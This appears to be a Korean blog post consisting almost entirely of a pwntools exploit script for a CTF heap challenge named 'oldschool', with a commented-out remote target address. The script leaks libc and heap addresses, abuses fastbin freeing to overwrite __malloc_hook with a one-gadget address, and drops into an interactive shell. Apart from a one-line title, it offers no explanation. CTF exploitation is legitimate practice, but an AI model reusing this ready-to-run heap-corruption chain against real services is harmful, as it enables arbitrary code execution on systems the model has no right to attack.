티스토리 뷰
의 heap문제입니다
oldschoolfrom pwn import *
#context.log_level = 'debug'
#p = remote("54.157.217.45", 19669)
p = process('./oldschool')
e = ELF("./oldschool")
#l = e.libc
l = ELF("./libc-2.23.so")
#context.log_level = 'debug'
def add(size, data):
p.recvuntil(": ")
p.sendline('1')
sleep(0.3)
p.recvuntil(": ")
p.send(str(size))
sleep(0.3)
p.recvuntil(": ")
p.send(str(data))
sleep(0.3)
def edit(idx, data):
p.recvuntil(": ")
p.sendline('2')
sleep(0.3)
p.recvuntil(": ")
p.sendline(str(idx))
sleep(0.3)
p.recvuntil(": ")
p.send(str(data))
sleep(0.3)
def show(idx):
p.recvuntil(": ")
p.sendline('3')
sleep(0.3)
p.recvuntil(": ")
p.sendline(str(idx))
sleep(0.3)
def fr(idx):
p.recvuntil(": ")
p.sendline('4')
sleep(0.3)
p.recvuntil(": ")
p.sendline(str(idx))
sleep(0.3)
fake = p64(0) + p64(0x21)
fake += p64(0)*3 + p64(0x21)
add(0x60, fake) # 0
add(0x200, 'a') # 1
add(0x10, 'a') # 2
add(0x10, 'a') # 3
fr(1)
add(0x200, 'b') # 1
show(1)
libc = u64(p.recvuntil("\x7f")[-6:].ljust(8, '\x00')) - 0x10 - l.sym['__malloc_hook'] - 66
log.info(hex(libc))
fr(2)
fr(3)
add(0x10, 'a') # 2
sleep(0.3)
add(0x10, 'b') # 3
show(2)
p.recvuntil('Name: ')
heap = u64(p.recv(6).ljust(8, '\x00')) - 0x61 -0x200
log.info(hex(heap))
fake = p64(0) + p64(0x21)
fake += p64(heap) + p64(0)*2 + p64(0x21)
edit(0, fake)
#context.log_level = 'debug'
add(0, '6') # 4
add(0, "6") # 5
edit(4, '6')
fr(5)
add(0, '6') # 5
add(0, '6')
fr(4)
fr(6)
edit(5, '6')
#context.log_level = 'debug'
add(0x10, p64(heap))
add(0x10, 'a')
fake = p64(0) + p64(0x21)
fake += p64(0)*3 + p64(0x21)
add(0x60, fake)
add(0x10, p64(heap+0x30)+p32(0x60) +p32(10))
add(0x60, 'a')
fr(9)
edit(0, p64(heap+0x30))
fr(0)
fr(3)
edit(8, p64(heap+0x460))
fr(7)
fr(1)
fr(2)
add(0x60, p64(libc+l.sym['__malloc_hook']-0x23))
add(0x60, 'a')
add(0x60, 'b')
add(0x60, "A"*19+p64(libc+0xf02a4))
p.recvuntil(": ")
p.send('1')
p.recv()
p.recv()
p.interactive()
댓글